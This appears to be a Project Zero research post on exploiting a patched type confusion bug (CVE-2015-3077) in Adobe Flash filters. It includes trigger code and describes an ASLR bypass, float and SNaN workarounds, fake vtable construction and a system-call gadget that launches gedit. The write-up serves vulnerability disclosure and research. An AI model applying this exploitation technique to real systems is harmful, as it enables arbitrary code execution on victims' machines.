Project Zero: One Perfect Bug: Exploiting Type Confusion in Flash

Posted by Natalie Silvanovich, Dazed and (Type) Confused

For some attackers, it is important that an exploit be extremely reliable. That is to say, the exploit should consistently lead to code execution when it is run on a system with a known platform and Flash version. One way to create such an exploit is to use an especially high-quality bug. This post describes the exploitation of one such bug, and the factors that make it especially good for reliable exploitation.

The Bug

CVE-2015-3077 is a type confusion issue in the Adobe Flash Button and MovieClip filters setters that allows any filter type to be confused with any other filter type. I reported it to Adobe in early February 2015 and it was fixed in May. The bug occurs due to the ability of an attacker to overwrite the constructor that is used to initialize a filter object. An example of code that manifests the issue is below:

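var filter = new flash.filters.BlurFilter();
object.filters = [filter];              // stored natively as a BlurFilter
var e = flash.filters.ConvolutionFilter;
flash["filters"] = [];
flash["filters"]["BlurFilter"] = e;     // overwrite the BlurFilter constructor
var f = object.filters;                 // getter rebuilds the ActionScript objects
var d = f[0];                           // ConvolutionFilter backed by a native BlurFilter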

This code is somewhat confusing because of its use of operator [], which is necessary for it to compile in Flash CS. Logically equivalent code (which is not guaranteed to compile) is below:

var filter = new flash.filters.BlurFilter();
object.filters = [filter];
flash.filters.BlurFilter = flash.filters.ConvolutionFilter;
var f = object.filters;
var d = f[0];

This code sets the filters field of object, a Button or MovieClip, to a BlurFilter, which is then stored natively by Flash. The BlurFilter constructor is then overwritten by the ConvolutionFilter constructor. Then the filters getter is called and an ActionScript object to hold the native BlurFilter is constructed. However, the constructor has been overwritten, so the ConvolutionFilter constructor is called. This leads to an object of type ConvolutionFilter that is backed by a native BlurFilter being returned.

The end result is that the fields of the native BlurFilter can be accessed (read or written) as if they belonged to a ConvolutionFilter, and likewise for any other pair of filter types. This allows a wide array of manipulation that is useful for exploitation.
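The mechanism can be illustrated with a toy model in Python. This is only a sketch of the logic described above, not Flash's implementation: the class names mirror the filters, but NativeFilter, filters_namespace and get_filters are hypothetical stand-ins invented for the illustration.

```python
class NativeFilter:
    """Stand-in for a natively stored filter: a type name plus raw fields."""
    def __init__(self, type_name, fields):
        self.type_name = type_name
        self.fields = fields


class BlurFilter:
    def __init__(self, native):
        self.native = native


class ConvolutionFilter:
    def __init__(self, native):
        self.native = native


# Script-writable table of constructors (a hypothetical model of flash.filters).
filters_namespace = {
    "BlurFilter": BlurFilter,
    "ConvolutionFilter": ConvolutionFilter,
}


def get_filters(native_filters):
    """Model of the getter: the wrapper constructor is looked up by name at
    call time, with no check that it still matches the native type."""
    return [filters_namespace[n.type_name](n) for n in native_filters]


# The setter stored a native BlurFilter.
stored = [NativeFilter("BlurFilter", {"blurX": 4.0, "blurY": 4.0})]

# The script overwrites the BlurFilter constructor.
filters_namespace["BlurFilter"] = filters_namespace["ConvolutionFilter"]

# The getter now builds a ConvolutionFilter around the native BlurFilter.
confused = get_filters(stored)[0]
print(type(confused).__name__, "wraps native", confused.native.type_name)
```

In this model the wrapper type and the native type disagree after the getter runs, which is the condition the rest of the post relies on.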

The following diagram shows the layout in memory of the native objects that can potentially be confused using this vulnerability on 64-bit Linux.

Figure: AS2 Filter Types

In two situations, pointers line up with integers or floats that can be manipulated, which means that pointers can be read and written directly. Also, since the fields of the objects are ordered and sized based on the class definition, they are always in an expected location, so reading and writing will never fail. These properties are important in making the exploit reliable.
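To make the idea of members lining up concrete, here is a small Python sketch using the struct module. The two layouts are simplified assumptions (a vtable followed by one pointer, and a vtable followed by two 32-bit integers), not the real Flash class definitions, and the field order of scolor and hcolor is assumed.

```python
import struct

# Hypothetical little-endian 64-bit layouts:
#   DisplacementMapFilter-like: vtable (8 bytes), bitmap pointer (8 bytes)
#   BevelFilter-like:           vtable (8 bytes), scolor (4 bytes), hcolor (4 bytes)
DISPLACEMENT_LAYOUT = "<QQ"
BEVEL_LAYOUT = "<QII"


def view_as_bevel(vtable, bitmap_ptr):
    """Reinterpret the bytes of one layout through the fields of the other."""
    raw = struct.pack(DISPLACEMENT_LAYOUT, vtable, bitmap_ptr)
    _vtable, scolor, hcolor = struct.unpack(BEVEL_LAYOUT, raw)
    return scolor, hcolor


scolor, hcolor = view_as_bevel(0x00007F0011223344, 0x00007F1234567890)
print(hex(scolor), hex(hcolor))
```

Because both layouts have the same size and fixed field offsets, the pointer always lands in the same two integers, which is why reads and writes through the confused type do not fail.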

The Exploit

Since exploiting this issue would likely require triggering the type confusion issue many times, I started off by creating a utility function that performed the type confusion, FilterConfuse.confuse. It also performs some cleanup, such as setting the ActionScript filter constructors back to normal so that the vulnerable function can be called multiple times without impacting the behaviour of ActionScript outside of the function.

The first step was to bypass ASLR by determining the address of a vtable. An ideal way to do this would be to confuse an object that has a vtable with an object that has a manipulable member overlapping the vtable, but all filter objects have vtables at the same offset. Instead, I used the BitmapData object in DisplacementMapFilter to determine the vtable address.

To determine the location in memory of the BitmapData object, I confused the DisplacementMapFilter with a BevelFilter. This caused the BitmapData pointer stored in the DisplacementMapFilter to line up with the color properties (shadowColor, shadowAlpha, highlightColor and highlightAlpha) of the BevelFilter. These properties are backed by two 32-bit integers (shown as scolor and hcolor above and below), and the color properties access the bottom 24 bits of each integer while the alpha properties access the top 8 bits. Reading these properties and combining them using bitwise arithmetic, it is possible to extract the exact address of the BitmapData object.
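The bitwise arithmetic involved can be sketched in Python as follows. This is an illustration under assumptions: the alpha values are treated as raw 8-bit integers (the real ActionScript properties may be scaled), and scolor is assumed to hold the low half of the pointer and hcolor the high half. The function names are made up for the example.

```python
def field_to_int(color, alpha):
    """Rebuild one 32-bit field: alpha is the top 8 bits, color the bottom 24."""
    return ((alpha & 0xFF) << 24) | (color & 0xFFFFFF)


def pointer_from_bevel(shadow_color, shadow_alpha, highlight_color, highlight_alpha):
    """Combine the four property values into one 64-bit address."""
    low = field_to_int(shadow_color, shadow_alpha)          # scolor, assumed low half
    high = field_to_int(highlight_color, highlight_alpha)   # hcolor, assumed high half
    return (high << 32) | low


print(hex(pointer_from_bevel(0x567890, 0x34, 0x007F12, 0x00)))
```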

Next, we need to read the vtable out of the top of the BitmapData object. To do this, I used the matrix property of the ConvolutionFilter object. This property is stored as a pointer to an array of floats that are allocated when the property is set, and an ActionScript array containing these floats is returned when the property is retrieved. By setting the matrix pointer to the BitmapData object, it is possible to read out the contents of this object in memory as an array of floats.

To set the pointer, I confused a ConvolutionFilter object with a DisplacementMapFilter object (not the same DisplacementMapFilter as used above!) and set the mapPoint property to the pointer location of the BitmapData object above. The mapPoint property is a point with x and y coordinates that are both integers (p_x and p_y in the figure below) that line up with the matrix pointer in the ConvolutionFilter, which made it easy enough to set this value. It was then possible to read the vtable from the BitmapData object by reading the matrix array from the ConvolutionFilter object (note that the object had to be confused to a DisplacementMapFilter and then confused back to a ConvolutionFilter to allow this).

Figure: Retrieving the vtable pointer value
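Splitting a 64-bit address across two integer coordinates is plain arithmetic, sketched below in Python. The sketch assumes the coordinates are signed 32-bit values and that p_x covers the low half of the pointer and p_y the high half; neither assumption is confirmed by the text, and the helper names are invented.

```python
def to_signed32(value):
    """Interpret the low 32 bits of value as a signed integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def point_from_pointer(ptr):
    """Split an address into the two coordinate values that would encode it."""
    p_x = to_signed32(ptr)          # low half, assumed to be p_x
    p_y = to_signed32(ptr >> 32)    # high half, assumed to be p_y
    return p_x, p_y


def pointer_from_point(p_x, p_y):
    """Inverse operation: rebuild the address from the two coordinates."""
    return ((p_y & 0xFFFFFFFF) << 32) | (p_x & 0xFFFFFFFF)


p_x, p_y = point_from_pointer(0x00007F12F4567890)
print(p_x, p_y, hex(pointer_from_point(p_x, p_y)))
```

If the coordinates are signed, a low half with its top bit set has to be passed as a negative number, which is why the round trip goes through to_signed32.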

At this point, it becomes more difficult to make this exploit reliable due to the use of floats. The vtable_low and vtable_high values are read from the ConvolutionFilter matrix as floats, as that is the array type, but unfortunately, not every possible valid value of a pointer is also a valid float. This means it’s possible that reading the value will lead to NaN, or worse, a numeric value that is not quite correct.
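The following Python sketch shows how the same 32 bits look when read as a float, and which bit patterns are NaNs. It only illustrates the IEEE 754 single-precision format; the example values are arbitrary and the function names are made up.

```python
import math
import struct


def bits_to_float(bits):
    """Reinterpret a 32-bit pattern as a single-precision float."""
    return struct.unpack("<f", struct.pack("<I", bits & 0xFFFFFFFF))[0]


def is_nan_pattern(bits):
    """A float is a NaN when its exponent is all ones and its mantissa is non-zero."""
    exponent = (bits >> 23) & 0xFF
    mantissa = bits & 0x7FFFFF
    return exponent == 0xFF and mantissa != 0


for half in (0x3F800000, 0x34567890, 0x7FC01230):
    value = bits_to_float(half)
    print(hex(half), value, math.isnan(value), is_nan_pattern(half))
```

Any pointer half whose bits 23 to 30 are all set falls into the NaN range, so such values cannot be handled safely as ordinary numbers.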

The ideal solution to this problem would be to access vtable_high and vtable_low through a getter that interprets them as integers, but one is not available, as filter members tend to be floats due to the nature of their functionality.

Fortunately, though, the AS2 virtual machine is lazy with regards to interpreting floats: it only converts a value in memory to a float when an operation in ActionScript is performed on it. Native operations generally do not cause floats to be interpreted unless the specific operation, such as arithmetic, requires it. This means that when a float from the matrix array is copied to vtable_low or vtable_high, it will maintain its value in memory, even if it is invalid for a float, until the variable it was copied to is actually used in ActionScript, or has arithmetic performed on it in native code. So if the variable value is immediately type confused to a different type that supports a full range of 32-bit values, such as an int, it is guaranteed that it will be the same value as the original value in memory of the matrix array. So to avoid introducing unreliability into the exploit, it is necessary to perform this type confusion before manipulating any floats in ActionScript.

To do this, I wrote a conversion class, FloatConverter, that uses type confusion in filters to implement integer-to-float and float-to-integer functions. It confuses the ColorMatrixFilter matrix property (not to be confused with the ConvolutionFilter matrix property), which is a series of inline floats, with the GlowFilter color and alpha properties, which access different bytes of an int.

Figure: Float converter
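The effect of the float-to-int direction can be modelled in Python as a reinterpretation of the same four bytes. This is a sketch of the idea only: float_to_int is a hypothetical name, and the split into a 24-bit color and an 8-bit alpha follows the description of the color properties earlier in the post.

```python
import struct


def float_to_int(value):
    """Model of float-to-int: store the value in a 32-bit float slot, then
    read the same bytes back through integer color and alpha fields."""
    raw = struct.pack("<f", value)          # float slot (ColorMatrixFilter-like)
    bits = struct.unpack("<I", raw)[0]      # same bytes seen as an int (GlowFilter-like)
    color = bits & 0xFFFFFF                 # what a color getter would expose
    alpha = bits >> 24                      # what an alpha getter would expose
    return (alpha << 24) | color


print(hex(float_to_int(1.0)), hex(float_to_int(-2.0)))
```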

While this implements reliable float-to-int conversion, unfortunately, it is not reliable for int-to-float. Because of the way the color array in the ColorMatrixFilter is accessed in ActionScript, the entire array is copied, even if only the first element is accessed. When the array is copied, each element is converted to a Number, which sometimes involves accessing pointers (for example, calling valueOf on an object). Since the color array is longer than the entire GlowFilter class, it extends onto the heap when confused with a GlowFilter. This means that conversion could occur on unknown values on the heap, possibly leading to crashes if they reference invalid pointers when being converted to Numbers. So for int-to-float, I implemented a float converter (below) that uses a different confusion in ConvolutionFilter and DisplacementMapFilter that is a direct cast, and does not cause any unknown values on the heap to be accessed.

This solves the problem of crashes due to accessing unknown heap values, but unfortunately, there is one more issue with reliability in this exploit relating to floats. It occurs due to the implementation of the ConvolutionFilter matrix getter. In ActionScript 2, all numeric values are stored as type Number, which is a union between an integer and a pointer to a double. The native ConvolutionFilter matrix is stored as an array of floats, but it is copied into an ActionScript array so that it can be accessed in ActionScript when the matrix getter is called, and its values are cast to doubles in the process. Then, when the float converter is called on the values, they are cast back to floats.

Casting a float to a double and back generally conserves its value, except in one specific case: when the float value is an SNaN. According to the floating point specification, there are two types of NaNs, quiet NaNs (QNaNs) and signalling NaNs (SNaNs). QNaNs do nothing if they occur, but SNaNs throw a floating point exception in some situations. On x86, casting a double to a float always results in a QNaN (even if the double resulted from an SNaN) to avoid unexpected exceptions.
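The distinction can be expressed directly on the bit pattern. The Python sketch below classifies a 32-bit value and models the round trip by setting the quiet bit (bit 22, counting from zero) on SNaNs. It is a model in integer arithmetic rather than a real hardware conversion, and the function names are invented.

```python
QUIET_BIT = 1 << 22  # first (most significant) bit of the 23-bit mantissa


def classify(bits):
    """Return 'SNaN', 'QNaN' or 'not NaN' for a single-precision bit pattern."""
    exponent = (bits >> 23) & 0xFF
    mantissa = bits & 0x7FFFFF
    if exponent != 0xFF or mantissa == 0:
        return "not NaN"
    return "QNaN" if bits & QUIET_BIT else "SNaN"


def after_round_trip(bits):
    """Model float -> double -> float: an SNaN comes back with the quiet bit set."""
    return bits | QUIET_BIT if classify(bits) == "SNaN" else bits


for bits in (0x34567890, 0x7FA01230, 0x7FE01230):
    print(hex(bits), classify(bits), hex(after_round_trip(bits)))
```

Only the SNaN pattern changes in this model, and it changes by exactly one bit.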

So if the lower bits of a pointer happen to be an SNaN, it will be converted to a QNaN, which means that one bit (the first bit of the mantissa, bit 22) will be set when it shouldn’t be. This problem is avoidable when the vtable is being read: the third byte of the pointer, which contains the bit that gets flipped, can be read unaligned to verify what its real value is. So the code will do an unaligned read (by performing the read of the vtable a second time with the Bitmap pointer incremented by one) and correct the int value if the float happens to be an SNaN.
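The correction can be modelled in Python on a byte buffer. In this sketch getter_read stands in for a read through the float getter (it sets bit 22 on any NaN pattern), and read_low_dword recovers the third byte from a second read taken one byte later. Both names are hypothetical, and the model always substitutes the recovered byte, which gives the same result as correcting only when an SNaN is detected.

```python
QUIET_BIT = 1 << 22


def getter_read(memory, offset):
    """Model a 4-byte read through a float getter: SNaNs come back quieted."""
    bits = int.from_bytes(memory[offset:offset + 4], "little")
    is_nan = ((bits >> 23) & 0xFF) == 0xFF and (bits & 0x7FFFFF) != 0
    return bits | QUIET_BIT if is_nan else bits


def read_low_dword(memory):
    """Recover the true low 32 bits using an aligned and a shifted read."""
    aligned = getter_read(memory, 0)
    shifted = getter_read(memory, 1)        # same data, starting one byte later
    true_byte2 = (shifted >> 8) & 0xFF      # original byte 2 now sits in bits 8..15
    return (aligned & ~0x00FF0000) | (true_byte2 << 16)


memory = (0x00007F127FA01230).to_bytes(8, "little")
print(hex(getter_read(memory, 0)), hex(read_low_dword(memory)))
```

The shifted read is safe to use because quieting can only alter bit 22 of whatever is read, and the byte of interest lies in bits 8 to 15 of the shifted value.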

Using the float converters implemented above, the vtable address can then be converted to an integer. Now we need to gain code execution using this address. An easy way to move the instruction pointer is to overwrite a vtable of an object (or a pointer to an object that has a vtable). This can be done by confusing the ConvolutionFilter matrix array with the DisplacementMapFilter BitmapData pointer.

BitmapData objects consist of a series of native backing objects. The ActionScript object contains a pointer to a BitmapData native object, which then contains pointers to other native objects. One such object is the bits object, which contains the actual bitmap bits. This bits object contains many virtual methods which are often the first methods called when any action is performed on the BitmapData object. To take advantage of this, the exploit creates a fake BitmapData object with a pointer to a fake bits object, and then calls a method which will lead to a virtual method call on the fake bits object.

The ConvolutionFilter.matrix property can be used to allocate a buffer of floats of any size via its setter as described above. The location of this buffer can then be determined by confusing the ConvolutionFilter with a DisplacementMapFilter and using the DisplacementMapFilter mapPoint property, similar to what was done to read the vtable location. Since the allocated arrays are immutable, it is necessary to first create a fake vtable object and then a fake bits object pointing to the vtable, and then create a fake bitmap pointing to it.

The first step is creating a fake vtable and determining its address using ConvolutionFilter/DisplacementMapFilter confusion.

Figure: Creating a fake vtable

Then, fake bitmap bits can be created and retrieved using the same method.

Figure: Creating a fake Bitmap Bits

Finally, a fake Bitmap pointing to the bits is created.

Figure: Creating a fake Bitmap

A reference to the fake bitmap can then be retrieved in ActionScript by setting a DisplacementMapFilter object’s BitmapData object to the pointer to the fake bitmap by confusing it with a BevelFilter, and setting the color properties to the pointer value, the reverse of what was done to read the location of the original BitmapData object the vtable was read out of. This object can then be confused back to a DisplacementMapFilter and the BitmapData object accessed by calling the mapImage getter. Then, whenever a method containing a virtual call (such as setPixel32) is called on the object, the method will call into the location specified in the fake vtable.

At this point, it’s worth looking into what’s actually in the fake vtable in more detail. The previous discussion of the float converter ignored one issue with SNaNs: writing floats. The ConvolutionFilter.matrix setter also converts floats to doubles and back before writing them, so if a pointer happens to be an SNaN value, and then gets written to the matrix array, bit 22 will get set, even if it is not set in the original value. This can be avoided in a limited way by using unaligned writes.

In memory, an SNaN pointer is laid out as follows:

00: XX XX YY QQ XX ZZ 00 00

Where:

XX can be any value from 0 to 0xFF

YY has bit 7 set to one (the lowest exponent bit) and bit 6 set to zero (the quiet bit), with no other constraints

QQ has all bits set to one except for bit 7 which can be 1 or 0

ZZ is a value with bit 7 set to zero with no other constraints.

It can be written unaligned as 32-bit floats as follows:

00: 00 XX XX YY
04: QQ XX ZZ 00
08: 00 00 00 00

This guarantees that if the original pointer is an SNaN, none of the unaligned values will be SNaNs (as YY will always have bit 6 unset if the original float is an SNaN, so the exponent of the first unaligned float cannot be all ones). It is not possible to do this with two consecutive pointers (unless they are known to both be SNaNs), though, as the layout would then be:

00: 00 XX XX YY
04: QQ XX ZZ 00
08: 00 XX XX XX
0C: QQ XX ZZ 00
10: 00 00 00 00

The float at 0x08 has bits 22 to 31 unconstrained, so it could end up being an SNaN and be written incorrectly.

So it is possible to write any pointer to a float array, regardless of whether it is an SNaN or not an SNaN, but it can only be done once. After the initial pointer has been written, all additional pointers need to be an SNaN if the original pointer was an SNaN and not an SNaN if the original pointer was not an SNaN. This exploit manages this constraint by only ever writing one pointer to any ConvolutionFilter.matrix array.
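The single-pointer case can be checked with a short Python sketch that shifts a 64-bit value by one byte and splits it into 32-bit words, following the layout shown above. The helper names and the example address are made up for the illustration.

```python
def is_snan(bits):
    """True if a 32-bit pattern is a signalling NaN (quiet bit 22 clear)."""
    exponent = (bits >> 23) & 0xFF
    mantissa = bits & 0x7FFFFF
    return exponent == 0xFF and mantissa != 0 and not (bits & (1 << 22))


def unaligned_words(ptr):
    """Place one 64-bit pointer one byte into a float array and return the
    three 32-bit words that would have to be written."""
    raw = b"\x00" + ptr.to_bytes(8, "little") + b"\x00" * 3
    return [int.from_bytes(raw[i:i + 4], "little") for i in range(0, 12, 4)]


ptr = 0x00007F127FA01230            # low half 0x7FA01230 is an SNaN pattern
words = unaligned_words(ptr)
print([hex(w) for w in words], [is_snan(w) for w in words])
```

With this example address, the aligned low half is an SNaN but none of the three shifted words is, so each could pass through a quieting conversion unchanged.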

For the fake Bitmap and fake Bitmap bits, this is easy, as they only need to contain one pointer. The challenge is that the fake vtable can only contain one pointer. This makes it difficult to both set up parameters for a call and make a call.

A good solution would be to move to a buffer that is fully modifiable after the first call to the vtable. Fortunately, the BitmapData class (which the fake bitmap is emulating) has a method, paletteMap, which creates such a buffer. This method has four parameters (redArray, greenArray, blueArray and alphaArray) which are ActionScript arrays of Numbers. When this method is called, they are converted to integers and copied to a native array of ints. Then, another native method with four pointers to this array (at appropriate offsets for the input arrays) is called. This method then makes the virtual call that jumps into the fake vtable.

As a part of the initial call, the array pointers are stored in x64 registers r12, r13, r14 and r15. This is very useful, as it makes pointers to four controllable buffers available. The single pointer in the fake vtable is then the following gadget:

mov rdi, r13
call [r12]

The buffer at r13 is set to the string “gedit”, and the buffer at r12 is set to a pointer to a gadget in the Flash library that calls the method system (with no concerns about SNaNs). This will cause gedit to be launched when the virtual call into the fake vtable is made.

This exploit is deterministic up to this point, though it does not exit cleanly (the Flash player crashes when gedit is exited). This should be fairly trivial to fix by putting multiple calls into the four available buffers, though.

Even if this were fixed, the exploit would not be able to survive the destruction of the Flash Player (for example, if the tab is closed or the SWF is refreshed). This is because calling the destructors of the filter objects will cause crashes due to confusion of pointers to ConvolutionFilter matrix arrays with pointers to BitmapData objects. These objects are allocated on different heaps, so calling delete on one object when the other was expected will lead to a crash. It is not possible to correct this by type confusing these objects ‘back’ to a good state, as type confusion in this specific bug creates a copy of the object, so the original bad object will remain and still need to be freed. It is also not possible to fix the problem by setting the parameters on the original object, as the BitmapData object and matrix object setters attempt to delete any existing object before setting it.

It is possible to avoid this crash while the exploit is in progress, and as long as the player remains open, by retaining references to the objects so they won’t be freed. The crash will still occur when the player is destroyed, though. That said, it should be possible for the code executed by the exploit to avoid the crash by correcting the type confused objects in memory, either by putting them in a correct state or by setting their destructor pointers to null. This is not implemented in this proof-of-concept exploit, though.

What Makes this Bug Reliable?

While type confusion is generally exploitable, there are a few factors that make CVE-2015-3077 especially amenable to reliable exploitation.

When type confusion is triggered, it always includes two types, the original type of the vulnerable object when it is instantiated, and the confused type that it becomes after the vulnerability is triggered. How the original type object members align with the confused type object members has a big impact on the exploitability and the reliability of the issue.

In this case, vulnerable original type members (i.e. pointers) line up with confused type members that can be directly manipulated by the attacker and vice versa. This is a best case scenario that leads to reliable exploitation.

Another common scenario is where the vulnerable original type members extend past the confused type members and their values are determined by out-of-bounds memory. This situation is usually exploitable, though not as reliably, as it can be difficult to ensure that heap blocks line up with the object in memory as expected.

Another possibility is that there are limits on how objects can be manipulated, for example, the original type object’s members can only be set to a limited number of values, and the confused object can only be read, or only have one specific method called on it. This situation tends to either be exploitable or not, based on the specific nature of the bug, and can also lead to bugs such as info leaks that need to be combined with other bugs to be exploitable. It is possible that this type of bug could be exploited reliably, but it would need to be a very ‘lucky’ bug that happens to have the right members with the right values.

Another aspect of this bug is that type confusion occurs at the end of the vulnerable function that causes the confusion. This is important because it means that an object can be confused, and then never manipulated in a way that the attacker doesn’t want it manipulated. Some type confusion bugs can be unreliable or unexploitable because methods that are called after the confusion occurs use the type confused objects in ways that expect them to be valid when they are not. Note that in the exploit above, the MovieClip object that the type confused field occurs in is set to have 0 by 0 dimensions. This prevents certain calls to the filter objects that could cause unreliability from occurring, as filters do not need to be applied to an object with no pixels.

Also, in this bug, object members outside of the ones that the attacker chooses to access are not used by the software. This is another problem that can impact the reliability and exploitability of type confusion bugs. Sometimes, a non-useful (from an attack perspective) member can cause crashes if it’s not possible for the attacker to correct it. Once again, setting the MovieClip to 0 by 0 prevents this, as filter methods are not accessed by Flash for an image with no pixels.

Finally, the ability to hold a reference to both the original and confused objects is important, as it prevents garbage collection, which almost always leads to a crash if it’s called on a type-confused object. Garbage collection assumes that object members are ‘correct’ in certain ways, such as containing valid pointers, which can cause crashes if this is not true, and it is usually not possible for an attacker to correct this, as garbage collection can occur at any time, so any window of invalidity is a problem. The only completely reliable solution is to prevent garbage collection while the objects are invalid.

Conclusion

A number of factors, including the layout of the original and confused objects’ members, how and when the object is used, and whether the object is subject to garbage collection, can affect the reliability of a type confusion bug. CVE-2015-3077 is an especially high-quality bug that can be exploited very reliably due to a convergence of these factors. Exploiting this bug required triggering the bug up to 31 times: eight times to get and set the object members needed for the exploit and 19 to 23 times for float conversion, depending on the number of SNaNs that occur. While this may seem large, the exploit is reliable because each step is deterministic and does not rely on any behaviour that is not guaranteed to occur.

Project Zero

Monday, July 20, 2015
